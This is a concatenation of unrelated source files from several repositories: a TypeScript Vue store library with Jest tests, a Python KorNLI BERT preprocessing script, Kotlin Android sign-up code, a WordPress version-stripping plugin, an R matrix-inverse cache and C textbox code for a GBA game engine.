(context: StoreContext): T
}
export type OnUseCallback = (storeName: string, storeInstance: StoreInstance, context: StoreContext) => void;
export type OnActionCallback = (storeName: string, storeInstance: StoreInstance, actionName: string, args: unknown[], result: unknown, context: StoreContext) => void;
export type OnMutateCallback = (storeName: string, storeInstance: StoreInstance, stateKey: string, value: unknown, oldValue: unknown, context: StoreContext) => void;
export type StorePluginHooks = {
onInitialized: (callback: OnUseCallback) => void,
onUse: (callback: OnUseCallback) => void,
onAction: (callback: OnActionCallback) => void,
onMutate: (callback: OnMutateCallback) => void
};
export type StorePluginProvider = (pluginName: string, dataOrFunction: unknown) => void;
export type StorePlugin = (provide: StorePluginProvider, hooks: StorePluginHooks) => void;
export interface StoreOptions {
plugins?: StorePlugin[]
}
export type VueStoreInstance = {
stores: { [name: string]: StoreInstance },
context: StoreContext,
listeners: {
use: OnUseCallback[]
init: OnUseCallback[]
action: OnActionCallback[],
mutate: OnMutateCallback[]
}
};
function validateStoreDefinition<T>({ name = '', setup = null }: StoreDefinition<T>, fnName: string): void {
assert(typeof name === 'string' && name.length > 0 && isFunction(setup), `${fnName}: invalid store definition`);
}
export function defineStore<T extends StoreInstance>(name: string, setup: StoreSetupFunction<T>): StoreDefinition<T> {
const def = { name, setup };
validateStoreDefinition(def, 'defineStore');
return def;
}
// eslint-disable-next-line @typescript-eslint/ban-types
function callListeners(listeners: Function[], ...params): void {
for (let i = 0, len = listeners.length; i < len; i++) {
listeners[i](...params);
}
}
type arrowFn = (...args) => never;
// eslint-disable-next-line @typescript-eslint/ban-types
const wrapAction = <T extends arrowFn>(fn: T, listeners: Function[], name: string, store: StoreInstance, key: string, context: StoreContext) => {
return (...args: Parameters<T>): ReturnType<T> => {
const result = fn(...args);
callListeners(listeners, name, store, key, args, result, context);
return result;
};
};
function registerStore<T>(instance: VueStoreInstance, { name, setup }: StoreDefinition<T>): T {
const { stores, context, listeners } = instance;
let hook = 'use';
if (isUndef(stores[name])) {
const store = setup(context);
const hasActionListeners = listeners.action.length > 0;
const hasMutateListeners = listeners.mutate.length > 0;
hook = 'init';
for (const key in store) {
if (hasActionListeners && isFunction(store[key])) {
store[key as string] = wrapAction(store[key as string], listeners.action, name, store, key, context);
}
if (hasMutateListeners && (isReactive(store[key]) || isRef(store[key]))) {
watch(store[key as string], (value, oldValue) => {
callListeners(listeners.mutate, name, stores[name], key, value, oldValue, context);
});
}
}
stores[name] = store;
}
callListeners(listeners[hook], name, stores[name], context);
return stores[name] as T;
}
export function useStore<T>(storeDefinition: StoreDefinition<T>): T {
validateStoreDefinition(storeDefinition, 'useStore');
return registerStore(inject(VueStoreSymbol) as VueStoreInstance, storeDefinition);
}
export function createVueStore(options1: StoreOptions = {}): Plugin {
const install = (app, options2: StoreOptions = {}): void => {
const { plugins } = { plugins: [], ...options1, ...options2 } as StoreOptions;
const
use: OnUseCallback[] = [],
init: OnUseCallback[] = [],
action: OnActionCallback[] = [],
mutate: OnMutateCallback[] = [];
const instance: VueStoreInstance = {
stores: {},
context: {},
listeners: { use, init, action, mutate }
};
assert(plugins instanceof Array, 'VueStore plugins must be an array');
if (plugins.length) {
const addToContext: StorePluginProvider = (pluginName: string, data: unknown): void => {
assert(typeof pluginName === 'string' && pluginName.trim().length > 0, `VueStorePlugin names must be a valid string. Invalid name: ${JSON.stringify(pluginName)}`);
assert(isUndef(instance.context[pluginName]), `VueStorePlugin names must be unique. Duplicate name: "${pluginName}"`);
assert(!isUndef(data), `VueStorePlugin (${pluginName}) does not provided anything`);
instance.context[pluginName] = data;
};
const hooks: StorePluginHooks = {
onInitialized: init.push.bind(init),
onUse: use.push.bind(use),
onAction: action.push.bind(action),
onMutate: mutate.push.bind(mutate)
};
for (let i = 0, len = plugins.length; i < len; i++) {
assert(isFunction(plugins[i]), `VueStorePlugin must be a function (instead of \`${typeof plugins[i]}\`)`);
plugins[i](addToContext, hooks);
}
}
app.provide(VueStoreSymbol, instance);
};
return {
install
};
}<file_sep># TODO
* [ ] eslint-typescript rules check
* [ ] example projects
* [ ] example shop
* [ ] plugins implementations
* [ ] Persist (localStorage)
* [ ] hydrate from SSR app
* [ ]
<file_sep>import { createVueStore, defineStore, StorePlugin, useStore } from '../src/';
import { computed, createApp, nextTick, ref } from 'vue';
function createHost() {
return document.createElement('div');
}
const body = document.body;
const hosts = { one: null, two: null };
body.appendChild(hosts.one = document.createElement('div'));
body.appendChild(hosts.two = document.createElement('div'));
const myStoreSetup = jest.fn(() => {
const count = ref(0);
function increment() {
count.value++;
}
return {
count,
increment
};
});
const myStore = defineStore('myStore', myStoreSetup);
describe('Plugin validations', () => {
function buildApp(plugins1, plugins2 = {}) {
return createApp(document.createElement('div')).use(createVueStore(plugins1), plugins2);
}
test('Should throw on invalid plugins option (string)', () => {
expect(() => buildApp({ plugins: 'meh' })).toThrow('VueStore plugins must be an array');
});
test('Should throw on invalid plugin (string)', () => {
expect(() => buildApp({ plugins: [ 'meh' ] })).toThrow('VueStorePlugin must be a function (instead of `string`)');
});
test('Should throw on invalid provided name/value', () => {
const plugin = (provide) => provide();
const plugin2 = (provide) => provide(' ');
const plugin3 = (provide) => provide('kek');
expect(() => buildApp({ plugins: [ plugin ] })).toThrow('VueStorePlugin names must be a valid string. Invalid name: undefined');
expect(() => buildApp({}, { plugins: [ plugin ] })).toThrow('VueStorePlugin names must be a valid string. Invalid name: undefined');
expect(() => buildApp({ plugins: [ plugin2 ] })).toThrow('VueStorePlugin names must be a valid string. Invalid name: " "');
expect(() => buildApp({ plugins: [ plugin3 ] })).toThrow('VueStorePlugin (kek) does not provided anything');
});
});
describe('Basic store functionality', () => {
let exposedStore;
const app = createApp({
render(ctx) {
return `count: ${ctx.count}`;
},
setup() {
exposedStore = useStore(myStore);
return {
count: exposedStore.count
};
}
});
const vueStore = createVueStore();
const installer = jest.fn(vueStore.install);
app.use(installer);
test('created store should have installed', () => {
expect(installer).toBeCalled();
});
test('defined store should be initialized after useStore', () => {
app.mount(hosts.one);
expect(myStoreSetup).toBeCalled();
});
test('store value should be visible in component', async() => {
await nextTick();
expect(hosts.one.textContent).toEqual('count: 0');
});
test('mutated store value should be updated in the component', async() => {
exposedStore.increment();
await nextTick();
expect(hosts.one.textContent).toEqual('count: 1');
});
});
describe('Validations', () => {
test('should throw on invalid store definition in useStore()', () => {
// @ts-expect-error testing
expect(() => useStore({})).toThrow('useStore: invalid store definition');
});
test('should throw on invalid store definition in defineStore()', () => {
// @ts-expect-error testing
expect(() => defineStore()).toThrow('defineStore: invalid store definition');
// @ts-expect-error testing
expect(() => defineStore(false)).toThrow('defineStore: invalid store definition');
// @ts-expect-error testing
expect(() => defineStore(false, null)).toThrow('defineStore: invalid store definition');
});
});
describe('Store composition and multi-app, plugins', () => {
const composedStore = defineStore('composed', ({ prefix }) => {
const { count } = useStore(myStore);
// @ts-expect-error can't type plugins... yet :/
const plusOne = computed(() => `${prefix()} ${count.value + 1}`);
return {
plusOne
};
});
const plugin = jest.fn((provide) => {
provide('prefix', () => '+ 1 =');
});
let exposedStore;
createApp({
render(ctx) {
return `count: ${ctx.count} ${ctx.plusOne}`;
},
setup() {
const { count } = exposedStore = useStore(myStore);
const { plusOne } = useStore(composedStore);
return {
count,
plusOne
};
}
}).use(createVueStore({
plugins: [ plugin ]
})).mount(hosts.two);
test('plugin should be added', () => {
expect(plugin).toBeCalled();
});
test('should initialize the store in the new app context', () => {
expect(exposedStore).toHaveProperty([ 'count', 'value' ], 0);
});
// ALL-IN :D
test('composed store values should be visible in the component', async() => {
await nextTick();
expect(hosts.two.textContent).toEqual('count: 0 + 1 = 1');
});
test('mutated store should trigger updates in the composed store', async() => {
exposedStore.increment();
await nextTick();
expect(hosts.two.textContent).toEqual('count: 1 + 1 = 2');
});
test('common store should be initialized two times (for each app)', () => {
expect(myStoreSetup).toBeCalledTimes(2);
});
});
describe('plugin system', () => {
/* eslint-disable @typescript-eslint/no-unused-vars, no-void */
const onInitCallback = jest.fn((name, instance, context) => { return void 0; });
const onUseCallback = jest.fn((name, instance, context) => { return void 0; });
const onActionCallback = jest.fn((name, instance, action, args, result, context) => { return void 0; });
const onMutateCallback = jest.fn((name, instance, key, value, old, context) => { return void 0; });
const mockedAction = jest.fn((a: string, b: string, c: number) => { return 'd'; });
/* eslint-enable @typescript-eslint/no-unused-vars */
const plugin: StorePlugin = (provide, { onInitialized, onUse, onAction, onMutate }) => {
onInitialized(onInitCallback);
onUse(onUseCallback);
onAction(onActionCallback);
onMutate(onMutateCallback);
};
const testStore = defineStore('test', () => {
return {
status: ref(null),
moo: mockedAction
};
});
const compoundStore = defineStore('compound', () => {
const test = useStore(testStore);
test.status.value = 'success';
test.moo('a', 'b', 1);
return {};
});
const app = createApp({
setup() {
useStore(testStore); // <-- "test" onInit.
useStore(compoundStore); // <-- "compound" onInit. (+"test" onUse)
return () => '';
}
}).use(createVueStore({
plugins: [ plugin ]
}));
app.mount(createHost());
test('should call onInitialize on useStore()', () => {
expect(onInitCallback).toBeCalledWith('test', expect.anything(), expect.anything());
});
test('should not call onInitialize twice for the same store', () => {
expect(onInitCallback).toBeCalledWith('compound', expect.anything(), expect.anything());
expect(onInitCallback).toBeCalledTimes(2);
});
test('should call onUse when reused', () => {
expect(onUseCallback).toBeCalledTimes(1);
});
test('should call onAction when a store function invoked', () => {
expect(onActionCallback).toBeCalledWith('test', expect.anything(), 'moo', [ 'a', 'b', 1 ], 'd', expect.anything());
});
test('should call onMutate only once when a store property mutated', () => {
expect(onMutateCallback).toBeCalledWith('test', expect.anything(), 'status', 'success', null, expect.anything());
expect(onMutateCallback).toBeCalledTimes(1);
});
});
<repo_name>silverstar0727/KorNLI_byBERT<file_sep>/preprocess.py
import os
import tensorflow as tf
from transformers import BertTokenizer, TFBertModel
import numpy as np
import pandas as pd
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
# fix the random seeds
tf.random.set_seed(1234)
np.random.seed(1234)
# BASE PARAMS
BATCH_SIZE = 32
NUM_EPOCHS = 3
MAX_LEN = 24 * 2 # average total length * 2, found via EDA
DATA_IN_PATH = './data_in/KOR'
DATA_OUT_PATH = "./data_out/KOR"
# training data
TRAIN_SNLI_DF = os.path.join(DATA_IN_PATH, 'KorNLI', 'snli_1.0_train.kor.tsv')
TRAIN_XNLI_DF = os.path.join(DATA_IN_PATH, 'KorNLI', 'multinli.train.ko.tsv')
train_data_snli = pd.read_csv(TRAIN_SNLI_DF, header=0, delimiter = '\t', quoting = 3)
train_data_xnli = pd.read_csv(TRAIN_XNLI_DF, header=0, delimiter = '\t', quoting = 3)
train_data_snli_xnli = train_data_snli.append(train_data_xnli) # merge the two training sets into one
train_data_snli_xnli = train_data_snli_xnli.dropna() # drop missing values
train_data_snli_xnli = train_data_snli_xnli.reset_index() # reset the index
# validation data
DEV_XNLI_DF = os.path.join(DATA_IN_PATH, 'KorNLI', 'xnli.dev.ko.tsv')
dev_data_xnli = pd.read_csv(DEV_XNLI_DF, header=0, delimiter = '\t', quoting = 3)
dev_data_xnli = dev_data_xnli.dropna() # drop missing values
# use the BertTokenizer from transformers
tokenizer = BertTokenizer.from_pretrained("bert-base-multilingual-cased",
cache_dir='bert_ckpt',
do_lower_case=False)
# bert_tokenizer_v2 takes two sentences and preprocesses them as a pair
def bert_tokenizer_v2(sent1, sent2, MAX_LEN):
encoded_dict = tokenizer.encode_plus(
text = sent1,
text_pair = sent2,
add_special_tokens = True,
max_length = MAX_LEN,
pad_to_max_length = True,
return_attention_mask = True)
input_id = encoded_dict['input_ids']
attention_mask = encoded_dict['attention_mask']
token_type_id = encoded_dict['token_type_ids']
return input_id, attention_mask, token_type_id
# lists to collect the outputs of bert_tokenizer_v2
input_ids = []
attention_masks = []
token_type_ids = []
# preprocess each sentence pair with bert_tokenizer_v2 and store the results
for sent1, sent2 in zip(dev_data_xnli['sentence1'], dev_data_xnli['sentence2']):
try:
input_id, attention_mask, token_type_id = bert_tokenizer_v2(sent1, sent2, MAX_LEN)
input_ids.append(input_id)
attention_masks.append(attention_mask)
token_type_ids.append(token_type_id)
    except Exception:
        pass # skip rows the tokenizer cannot handle
# convert the labels from entailment/contradiction/neutral to the integers 0/1/2
label_dict = {'entailment': 0, 'contradiction': 1, 'neutral': 2}
def convert_int(label):
num_label = label_dict[label]
return num_label
train_data_snli_xnli['gold_label_int'] = train_data_snli_xnli['gold_label'].apply(convert_int)
train_data_labels = np.array(train_data_snli_xnli['gold_label_int'], dtype = int)
dev_data_xnli['gold_label_int'] = dev_data_xnli['gold_label'].apply(convert_int)
dev_data_labels = np.array(dev_data_xnli['gold_label_int'], dtype = int)
print("# train labels: {}, #dev labels: {}".format(len(train_data_labels), len(dev_data_labels)))
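The padded outputs collected above are typically stacked into numpy arrays before being fed to the model. A minimal sketch with toy data (the values below are illustrative placeholders, not real BERT token ids, and `train_inputs` is a hypothetical name not used elsewhere in this script):

```python
import numpy as np

# Toy tokenizer outputs (illustrative placeholders, not real BERT token ids)
input_ids = [[101, 9, 102, 0], [101, 7, 8, 102]]
attention_masks = [[1, 1, 1, 0], [1, 1, 1, 1]]
token_type_ids = [[0, 0, 0, 0], [0, 0, 1, 1]]

# Stack each list into a (num_examples, MAX_LEN) integer array
train_inputs = (
    np.array(input_ids, dtype=int),
    np.array(attention_masks, dtype=int),
    np.array(token_type_ids, dtype=int),
)

for arr in train_inputs:
    print(arr.shape)  # (2, 4) for each of the three arrays
```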
<file_sep>package com.example.greenthumb_test
data class User(val user_id:Int, val email_id:String?, val user_type:Int)<file_sep>package com.example.greenthumb_test
import android.content.IntentFilter
import android.net.ConnectivityManager
import android.os.Bundle
import android.view.View
import android.widget.ProgressBar
import androidx.appcompat.app.AppCompatActivity
import com.google.android.material.snackbar.Snackbar
open class BaseActivity : AppCompatActivity(),ConnectivityReceiver.ConnectivityReceiverListener {
private var mSnackBar: Snackbar? = null
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
registerReceiver(ConnectivityReceiver(),
IntentFilter(ConnectivityManager.CONNECTIVITY_ACTION)
)
}
private fun showMessage(isConnected: Boolean) {
if (!isConnected) {
mSnackBar = Snackbar.make(findViewById(R.id.rootLayout), "You are offline now.", Snackbar.LENGTH_LONG)
mSnackBar?.show()
} else {
mSnackBar = Snackbar.make(findViewById(R.id.rootLayout), "You are online now.", Snackbar.LENGTH_LONG)
mSnackBar?.show()
}
}
override fun onResume() {
super.onResume()
ConnectivityReceiver.connectivityReceiverListener = this
}
override fun onNetworkConnectionChanged(isConnected: Boolean) {
showMessage(isConnected)
}
//ProgressBar
private var progressBar: ProgressBar? = null
fun setProgressBar(bar: ProgressBar) {
progressBar = bar
}
fun showProgressBar() {
progressBar?.visibility = View.VISIBLE
}
fun hideProgressBar() {
progressBar?.visibility = View.INVISIBLE
}
public override fun onStop() {
super.onStop()
hideProgressBar()
}
}<file_sep>package com.example.greenthumb_test
import android.os.Bundle
import android.view.View
import android.widget.AdapterView
import android.widget.ArrayAdapter
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import com.basgeekball.awesomevalidation.AwesomeValidation
import com.google.gson.GsonBuilder
import com.google.gson.JsonObject
import kotlinx.android.synthetic.main.activity_sign_up.*
import retrofit2.Call
import retrofit2.Callback
import retrofit2.Response
class SignUpActivity : AppCompatActivity(), AdapterView.OnItemSelectedListener {
val builder = GsonBuilder()
val gson = builder.serializeNulls().create()
private lateinit var countryList : Array<CountryData>
private lateinit var stateList : Array<StateData>
private lateinit var cityList : Array<CityData>
private lateinit var countryId :String
private lateinit var stateId:String
private lateinit var cityId:String
var user_type: Int = 1
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_sign_up)
toolbarSignUp.title=""
setSupportActionBar(toolbarSignUp)
supportActionBar!!.setDisplayHomeAsUpEnabled(true)
supportActionBar!!.setDisplayShowHomeEnabled(true)
countrySpinner.onItemSelectedListener = this
stateSpinner.onItemSelectedListener = this
citySpinner.onItemSelectedListener = this
countryApi()
radioSignUp.setOnCheckedChangeListener { group, checkedId ->
if (checkedId == R.id.rUser)
user_type = 1
if (checkedId == R.id.rProvider)
user_type = 2
if (checkedId == R.id.rConsultant)
user_type = 3
}
signUpButton.setOnClickListener {
val firstN = firstName.text.toString().trim()
val lastN = lastName.text.toString().trim()
val phone = phoneNumber.text.toString().trim()
val emailId = emailID.text.toString().trim()
val password = passwordText.text.toString().trim()
val cpassword = confirmPass.text.toString().trim()
if(firstN.isEmpty()){
firstName.error = "First Name required"
firstName.requestFocus()
return@setOnClickListener
}
if(lastN.isEmpty()){
lastName.error = "Last Name required"
lastName.requestFocus()
return@setOnClickListener
}
if(phone.isEmpty()){
phoneNumber.error = "Phone required"
phoneNumber.requestFocus()
return@setOnClickListener
}
if(emailId.isEmpty()){
emailID.error = "Email required"
emailID.requestFocus()
return@setOnClickListener
}
if(password.isEmpty()){
passwordText.error = "Password required"
passwordText.requestFocus()
return@setOnClickListener
}
if(cpassword.isEmpty()){
confirmPass.error = "Confirm Password required"
confirmPass.requestFocus()
return@setOnClickListener
}
if(cpassword != password){
confirmPass.error = "Passwords don't match"
confirmPass.requestFocus()
return@setOnClickListener
}
Toast.makeText(this,cityId,Toast.LENGTH_SHORT).show()
callSignUpAPI(firstN,lastN,phone,password,user_type,emailId,countryId,cityId,stateId)
}
}
private fun countryApi() {
RetrofitClient.instance.countryList()
.enqueue(object : Callback<JsonObject>{
override fun onResponse(call: Call<JsonObject>, response: Response<JsonObject>) {
when{
response.code() == 200 -> {
CountrySpinnerLoad(response)
}
response.code() == 400 -> {
val res = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
}
}
}
override fun onFailure(call: Call<JsonObject>, t: Throwable) {
Toast.makeText(applicationContext, "Some error",Toast.LENGTH_SHORT).show()
}
})
}
private fun callSignUpAPI(
firstName: String,
lastName: String,
phone: String,
password: String,
userType: Int,
emailId: String,
country: String,
city: String,
state: String
) {
RetrofitClient.instance.userSignup(firstName, lastName,emailId,password,phone,country,state,city,userType)
.enqueue(object : Callback<JsonObject> {
override fun onResponse(
call: Call<JsonObject>,
response: Response<JsonObject>
) {
when {
response.code() == 400 -> {
val loginBase = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
Toast.makeText(applicationContext, loginBase.message, Toast.LENGTH_LONG).show()
}
response.code() == 200 -> {
val loginBase = gson.fromJson(response.body().toString(), SignupResponse::class.java)
Toast.makeText(applicationContext, loginBase.message, Toast.LENGTH_LONG).show()
if (loginBase.status == resources.getString(R.string.success)) {
Toast.makeText(applicationContext, loginBase.message, Toast.LENGTH_LONG).show()
}
}
else -> {
Toast.makeText(
applicationContext,
resources.getString(R.string.something_went),
Toast.LENGTH_LONG
).show()
}
}
} override fun onFailure(call: Call<JsonObject>, t: Throwable) {
}
})
}
override fun onSupportNavigateUp(): Boolean {
onBackPressed()
return true
}
override fun onNothingSelected(parent: AdapterView<*>?) {
// no-op: throwing here (e.g. via TODO()) would crash when no item is selected
}
override fun onItemSelected(parent: AdapterView<*>?, view: View?, position: Int, id: Long) {
when(parent?.id) {
R.id.countrySpinner -> {
countryId = countryList.get(position).country_id
RetrofitClient.instance.stateList(countryId)
.enqueue(object : Callback<JsonObject>{
override fun onResponse(call: Call<JsonObject>, response: Response<JsonObject>) {
when{
response.code() == 200 -> {
StateSpinnerLoad(response)
}
response.code() == 400 -> {
val res = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
}
}
}
override fun onFailure(call: Call<JsonObject>, t: Throwable) {
Toast.makeText(applicationContext, "Some error",Toast.LENGTH_SHORT).show()
}
})
}
R.id.stateSpinner -> {
stateId = stateList[position].state_id
RetrofitClient.instance.cityList(stateId)
.enqueue(object : Callback<JsonObject>{
override fun onResponse(call: Call<JsonObject>, response: Response<JsonObject>) {
when{
response.code() == 200 -> {
CitySpinnerLoad(response)
}
response.code() == 400 -> {
val res = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
Toast.makeText(applicationContext, res.message, Toast.LENGTH_LONG).show()
}
}
}
override fun onFailure(call: Call<JsonObject>, t: Throwable) {
Toast.makeText(applicationContext, "Some error", Toast.LENGTH_SHORT).show()
}
})
}
R.id.citySpinner -> {
cityId = cityList[position].city_id
}
}
}
private fun CountrySpinnerLoad(response: Response<JsonObject>) {
val res = gson.fromJson(response.body().toString(), CountryResponse::class.java)
countryList = res.data.toTypedArray()
val country = countryList.map { it.country_name }
val adapter = ArrayAdapter(this@SignUpActivity, android.R.layout.simple_spinner_item, country)
adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item)
countrySpinner.adapter = adapter
}
private fun CitySpinnerLoad(response: Response<JsonObject>) {
val res = gson.fromJson(response.body().toString(), CityResponse::class.java)
cityList = res.data.toTypedArray()
val city = cityList.map { it.city_name }
val adapter = ArrayAdapter(this@SignUpActivity, android.R.layout.simple_spinner_item, city)
adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item)
citySpinner.adapter = adapter
}
private fun StateSpinnerLoad(response: Response<JsonObject>) {
val res = gson.fromJson(response.body().toString(), StateResponse::class.java)
stateList = res.data.toTypedArray()
val state = stateList.map { it.state_name }
val adapter = ArrayAdapter(this@SignUpActivity, android.R.layout.simple_spinner_item, state)
adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item)
stateSpinner.adapter = adapter
}
}
<file_sep>package com.example.greenthumb_test
data class CityData(
val city_id: String,
val city_name: String
)
<file_sep>rootProject.name='Greenthumb_test'
include ':app'
<file_sep>package com.example.greenthumb_test
data class CountryData(
val country_id: String,
val country_name: String
)<file_sep>package com.example.greenthumb_test
data class CountryResponse(
val data: List<CountryData>,
val message: String,
val status: String
)<file_sep>package com.example.greenthumb_test
data class LoginResponse(val status: String, val message:String, val data: User)<file_sep>package com.example.greenthumb_test
data class CityResponse(
val data: List<CityData>,
val message: String,
val status: String
)
<file_sep>package com.example.greenthumb_test
data class SignupResponse(val status: String, val message:String, val data: User)<file_sep>package com.example.greenthumb_test
data class StateResponse(
val data: List<StateData>,
val message: String,
val status: String
)
<file_sep>package com.example.greenthumb_test
data class StateData(
val state_id: String,
val state_name: String
)
|
204cbeee46ca8ebb181d6492c0c9eb764f9b164b
|
[
"Kotlin",
"Gradle"
] | 12 |
Kotlin
|
sys029/greenthumb_test
|
7e39113afbcb7955b7ee96942ae26582405a4935
|
6b3b77dcb03724068326d7424a4795fdd864dc9d
|
refs/heads/master
|
<file_sep><?php
/*
Plugin Name: Remove Script & Stylesheet Versions
Description: Removes the version string (?ver=) from scripts and stylesheets.
Author: Kawauso
Version: 1.0
*/
function rssv_scripts() {
global $wp_scripts;
if ( !is_a( $wp_scripts, 'WP_Scripts' ) )
return;
foreach ( $wp_scripts->registered as $handle => $script )
$wp_scripts->registered[$handle]->ver = null;
}
function rssv_styles() {
global $wp_styles;
if ( !is_a( $wp_styles, 'WP_Styles' ) )
return;
foreach ( $wp_styles->registered as $handle => $style )
$wp_styles->registered[$handle]->ver = null;
}
add_action( 'wp_print_scripts', 'rssv_scripts', 100 );
add_action( 'wp_print_footer_scripts', 'rssv_scripts', 100 );
add_action( 'admin_print_styles', 'rssv_styles', 100 );
add_action( 'wp_print_styles', 'rssv_styles', 100 );<file_sep>=== Remove Script & Stylesheet Versions ===
Contributors: Kawauso
Tags: version, script, stylesheets
Requires at least: 3.0
Tested up to: 3.1
Stable tag: 1.0
Removes the ?ver= parameter from enqueued scripts and stylesheets URLs.
== Description ==
Removes the version parameter from scripts and stylesheets enqueued by WordPress' `wp_enqueue_script()` and `wp_enqueue_style()` functions.
== Installation ==
1. Upload `remove-script-style-versions.php` to the `/wp-content/plugins/` directory
1. Activate the plugin through the 'Plugins' menu in WordPress
== Changelog ==
= 1.0 =
* First public release
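To illustrate the effect outside WordPress: the plugin nulls each registered handle's version before the asset URL is built, which is equivalent to stripping the `ver` query parameter from the final URL. A minimal Python sketch of that URL transformation (illustrative only — the plugin itself never manipulates URLs directly, and `strip_ver` is a hypothetical helper, not part of the plugin):

```python
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

def strip_ver(url: str) -> str:
    """Remove the ver query parameter from an asset URL, keeping other params."""
    parts = urlparse(url)
    query = [(k, v) for k, v in parse_qsl(parts.query) if k != "ver"]
    return urlunparse(parts._replace(query=urlencode(query)))

print(strip_ver("https://example.com/wp-content/themes/x/style.css?ver=5.8"))
# → https://example.com/wp-content/themes/x/style.css
```

Other query parameters (e.g. a `min=1` flag) survive; only `ver` is dropped, mirroring what setting `->ver = null` achieves on the WordPress side.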
|
725a817d563ae0937a4b2e3a06f0eceec40353f8
|
[
"Text",
"PHP"
] | 2 |
PHP
|
WPPlugins/remove-script-stylesheet-versions
|
ead5b0659808faf69ef746f01ba1d838bd4268c4
|
102b9f99df395491465ea3ec235dccd1a4842e4d
|
refs/heads/master
|
<file_sep>## These functions allow to cache the computed inverse of a matrix in order to avoid repeated
## computations of the same inverse matrix
## This function creates a special matrix that can cache its inverse
makeCacheMatrix <- function(x = matrix()) {
i <- NULL
set <- function(y) {
x <<- y
i <<- NULL
}
get <- function () x
setsolve <- function(solve) i <<- solve
getsolve <- function () i
list (set = set, get = get,
setsolve = setsolve,
getsolve = getsolve)
}
## This function computes the inverse of the special "matrix" returned by makeCacheMatrix.
## If the inverse has already been calculated (and the matrix has not changed), it is retrieved from the cache
cacheSolve <- function(x, ...) {
## Return a matrix that is the inverse of 'x'
i <- x$getsolve()
if(!is.null(i)) {
message("getting cached data")
return(i)
}
data <- x$get()
i <- solve(data, ...)
x$setsolve(i)
i
}
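The caching pattern above — a constructor closing over mutable state, plus an accessor that computes on first use and returns the cached value afterwards — is language-agnostic. As an illustrative sketch only (plain Python, with a generic `compute` function standing in for R's `solve`; `make_cache` is a hypothetical name, not part of the assignment):

```python
def make_cache(value, compute):
    """Wrap value with a memoized compute(value), mirroring makeCacheMatrix/cacheSolve."""
    cache = {"result": None}

    def get():
        return value

    def solve():
        if cache["result"] is None:
            cache["result"] = compute(value)  # first call: do the expensive work
        else:
            print("getting cached data")      # later calls: reuse the stored result
        return cache["result"]

    return {"get": get, "solve": solve}

m = make_cache(4, lambda x: x ** 0.5)
print(m["solve"]())  # computes and returns 2.0
print(m["solve"]())  # prints "getting cached data", returns 2.0
```

As in the R version, the cache is tied to the wrapped value: constructing a new wrapper (the analogue of calling `set`) resets the cached result to `None`.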
|
1f501f4b6d91000dbea1cf4d25515ec90d2b9b85
|
[
"R"
] | 1 |
R
|
BobT3d/ProgrammingAssignment2
|
b3b3670a8dee6848528ad29f956d85f5a0944142
|
a75366b253a66110e65a1d42dea5bace39739cbb
|
refs/heads/master
|
<repo_name>EternalCode/mega-evolution-cutscene<file_sep>/src/engine/text/textboxes.c
#include "..\types.h"
#include "string_funcs.h"
#include "textboxes.h"
#include "..\character_control\buttons\buttons.h"
// draw text
void task_text_draw(u8 task_id) {
struct task* task = &tasks[task_id];
switch (task->priv[0]) {
case 0:
{
struct rbox this_box = {0x0, 0x0, 0x2, 0x1E, 0x0D, 0x0F, 0x1, 0x20100};
u8 r_id = rbox_get_id_something(&this_box);
task->priv[1] = r_id;
rboxid_clear_pixels(r_id, 0);
rboxid_tilemap_update(r_id);
rboxid_upload_a(r_id, 3);
task->priv[0]++;
break;
}
case 1:
{
if (sub_807F3A4(task_id, string_buffer, 2, 8) << 24) {
task->priv[0]++;
}
break;
}
case 2:
{
u8 r_id = (task->priv[1] & 0xFF); //rbox id, byte
rboxid_80040B8(r_id);
rboxid_upload_a(r_id, 1);
rboxid_8003E3C(r_id);
task->priv[0]++;
break;
}
case 3:
{
if (sub_807E418() == 1) {
superstate.multipurpose_state_tracker++;
task_del(task_id);
}
break;
}
case 4:
{
task->priv[0] = 0;
break;
}
default:
task->priv[0]--;
break;
};
return;
}
u8 draw_text(u8 delay, char *string) {
str_cpy(string_buffer, string);
u8 t_id = task_add(task_text_draw, 0xA);
tasks[t_id].priv[0] = delay;
return t_id;
}
void multichoice_box(char **options, u8 option_number, struct rbox* box, u8 state_id) {
u8 box_id = rbox_get_id_something(box);
box_curved(box_id, 1);
rboxid_clear_pixels(box_id, 0x11);
u8 i;
for (i = 0; i < option_number; i++) {
box_print(box_id, 2, 8, (1 + (16 * i)), 1, 0, options[i]);
}
u8 f_id = fboxid_get_field(2, 1);
sub_810F7D8(box_id, 2, 0, 1, f_id +2, 2, 0);
rboxid_upload_a(box_id, 3);
u8 t_id = task_add(wait_select +1, 1);
tasks[t_id].priv[13] = box_id;
tasks[t_id].priv[0] = state_id;
tasks[t_id].priv[1] = option_number;
}
void wait_select(u8 task_id) {
struct task *task = &tasks[task_id];
u16 option = sub_810FA04();
if (option == -1) {
return;
} else {
if (option < task->priv[1]) {
temp_vars.var_800D = option;
sub_0812FFF0(task_id); //normally sets another task, but we del task
task_del(task_id);
superstate.multipurpose_state_tracker = task->priv[0];
}
return;
}
}
void msg_normal (char *str){
// Bg_id, x, y, w, h, color, leave, leave
struct rbox msg_normal = {0, 2, 15, 0x19, 0x4, rboxes[0].pal_id, 0x1, 0};
u8 box_id = rbox_get_id_something(&msg_normal);
box_curved(box_id, 1);
rboxid_tilemap_update(box_id);
rboxid_clear_pixels(box_id, 17);
box_related_one(box_id, 2, str, 1, 0, 2, 1, 3);
rboxid_upload_a(box_id, 3);
}<file_sep>/src/engine/objectss.h
#ifndef ENGINE_OBJECTS_H
#define ENGINE_OBJECTS_H
struct object;
typedef void (*object_callback)(struct object*);
typedef struct frame {
u16 data;
u16 duration;
} frame;
struct rotscale_frame {
u16 scale_delta_x;
u16 scale_delta_y;
u8 rotation_delta;
u8 duration;
u16 field_6;
};
struct attr0 {
u8 y;
